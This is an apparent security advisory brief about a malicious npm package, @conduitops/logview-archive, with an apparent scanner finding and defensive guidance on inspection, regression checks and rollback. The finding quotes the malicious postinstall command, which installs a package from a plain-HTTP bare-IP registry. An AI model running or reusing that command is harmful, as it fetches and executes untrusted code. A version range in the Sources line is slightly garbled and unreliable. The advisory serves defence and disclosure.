Source: amazon-inspector (28d0b0e9770a9db54aa03ba508bea0ed1b7ff5fc76ab28a472f09e7a8af088c7) On install, package.json's postinstall runs node install.js, which reads lib/toolchain.json and executes `npm install @conduit/logview-cli@2.2.0 --registry http://139.196.94.195:8080/dl/npm/` into vendor/. The registry is plain HTTP on a bare IP (139.196.94.195:8080, Alibaba Cloud range) that does not match the publisher infrastructure declared in package.json (repository/homepage/bugs under *.conduit.internal, maintainer platform-ops@conduit.internal). The fetched package is also in a different scope (@conduit) than the host package (@conduitops), compounding dependency-confusion exposure. npm will download and execute whatever that host serves — including any lifecycle scripts of the fetched tarball — with no TLS verification and no integrity check, giving whoever controls that endpoint (or any on-path attacker) arbitrary code…

# Patch Next advisory brief: mal-2026-18183 Advisory: Malicious code in @conduitops/logview-archive (npm) IDs: mal-2026-18183 Record: https://patchnext.com/advisories/mal-2026-18183 (revision 1, source checked 2 Nov 2026, 06:00 UTC) Inventory: none attached. This brief comes from a public page and does not say whether any deployment is affected. Severity: Unrated Exploitation: no confirmed exploitation recorded. Patch Next confirms exploitation only from CISA KEV. Vendor response: Vendor response not established. A vendor fix does not mean a deployment is fixed. ## Affected components - npm @conduitops/logview-archive: affected >= 1.0.1, <= 1.0.1; >= 1.0.0, <= 1.0.0 ## Suggested inspection (read-only) - `npm ls @conduitops/logview-archive --all`: lists every installed copy and version, including transitive ones. Run in the project root after `npm ci`. ## Supported action No complete vendor fix is recorded. Follow the primary source's mitigation guidance and check this record again before closing anything. ## Required regression checks - Run the test suite and a production build. - Exercise the features that depend on @conduitops/logview-archive. - Repeat the inspection and confirm that only fixed versions remain installed. ## Rollback considerations - Keep the previous lockfile and deployment artifact. Rolling back reinstates the vulnerable version, so apply any documented mitigation while you fix forward. ## Unresolved questions - Which deployments run an affected version? - Exploitation status can change. Check again before lowering the priority. - Mark the work resolved only after the fixed version is verified in production. ## Sources - Verified: https://osv.dev/vulnerability/MAL-2026-18183 (OSV record MAL-2026-18183 lists affected ranges: npm @conduitops/logview-archive >=1.0.1 =1.0.0 <=1.0.0) Commands are suggestions: review each one before running it.
